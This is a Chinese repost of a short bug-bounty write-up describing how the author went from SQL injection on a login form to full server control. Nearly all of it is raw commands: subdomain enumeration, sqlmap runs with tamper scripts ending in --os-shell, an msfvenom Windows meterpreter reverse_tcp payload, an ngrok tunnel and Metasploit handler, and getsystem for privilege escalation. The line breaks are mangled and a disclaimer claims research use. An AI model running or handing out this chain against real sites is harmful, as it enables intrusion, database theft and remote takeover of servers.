|
来源:Medium,作者:RyuuKhagetsu
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
正文
amass
enum
-d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt
cat
subs.txt | httpx -mc
200
-o
200
-subs.txt
sqlmap -u “https:
//www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — dbs
sqlmap -u “https:
//www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — is-dba
sqlmap -u “https:
//www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — os-shell
我在心里想:“我可以获取管理员用户吗?” 我尝试使用 Metasploit 和 Ngrok 进行反向连接。
打开终端并使用命令启动 ngrok
ngrok
TCP
1337
msfvenom -p windows/meterpreter/reverse_tcp lhost=*without tcp:
//* lport=*Enter the port* -f exe -o back.exe
use
exploit/multi/
handler
set
payload windows/meterpreter/reverse_tcp
set
lhost
0.0
.0
.0
set
lport
1337
(
If
you
are
using
a different port,
then
use
the port you specified
when
setting up “ngrok tcp port” )
exploit
nt authority
*not_administrator*
getsystem
getuid
我立即报告了我的发现,并且由于我发现的错误,我收到了几个确认和奖励,因为它们包含多个网站。
可能我的就这些吧,希望能给大家一个参考,我是RyuuKhagetsu,下篇文章见。
原文始发于微信公众号(潇湘信安):通过 SQL 注入访问服务器!!!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论